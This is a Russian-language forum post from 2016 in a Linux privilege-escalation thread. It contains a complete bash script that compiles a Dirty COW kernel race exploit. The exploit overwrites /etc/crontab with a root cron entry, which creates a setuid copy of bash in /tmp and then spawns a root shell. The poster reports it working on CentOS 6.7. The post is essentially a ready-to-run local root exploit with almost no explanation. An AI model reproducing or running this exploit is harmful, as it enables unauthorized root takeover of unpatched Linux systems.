Prev Предыдущее сообщение   Следующее сообщение Next
Старый 25.10.2016, 20:09   #14
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

вот кароче
Цитата:
#!/bin/bash

cat <<EOF > cow.c
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

char suid_binary[] = "/etc/crontab";
unsigned char shell_code[] = {
0x53, 0x48, 0x45, 0x4c, 0x4c, 0x3d, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
0x68, 0x0a, 0x2a, 0x20, 0x2a, 0x20, 0x2a, 0x20, 0x2a, 0x20, 0x2a, 0x20,
0x72, 0x6f, 0x6f, 0x74, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x78, 0x0a,
0x23
};
unsigned int sc_len = 37;



void *madviseThread(void *arg) {
int i,c=0;
for(i=0;i<200000000;i++)
c+=madvise(map,100,MADV_DONTNEED);
}


int main(int argc,char *argv[]){
f=open(suid_binary,O_RDONLY);
fstat(f,&st);
map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MA P_PRIVATE,f,0);
pid=fork();
if(pid){
waitpid(pid,NULL,0);
int u,i,o,c=0,l=sc_len;
for(i=0;i<10000/l;i++)
for(o=0;o<l;o++)
for(u=0;u<10000;u++)
c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shel l_code+o)));
}
else{
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(),SIGSTOP);
pthread_join(pth,NULL);
}
return 0;
}

EOF
gcc -lpthread -o ./cow ./cow.c
cat <<EOF >/tmp/x
#!/bin/bash
/bin/cp /bin/bash /tmp/sbash
/bin/chmod 4755 /tmp/sbash
EOF
chmod +x /tmp/x
./cow &


while true
do
if [ -f "/tmp/sbash" ]
then /tmp/sbash -p
else
sleep 1
fi
done
через /etc/crontab, проверил на CentOS release 6.7 (Final) - работает.
првада только когда crontab перезагрузит конфиги, так как время модификации не изменяется от эксплоита, ну тут главное принцип.

Последний раз редактировалось tex; 25.10.2016 в 21:40..
tex вне форума   Ответить с цитированием
 

Метки
linux, privilege escalation

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot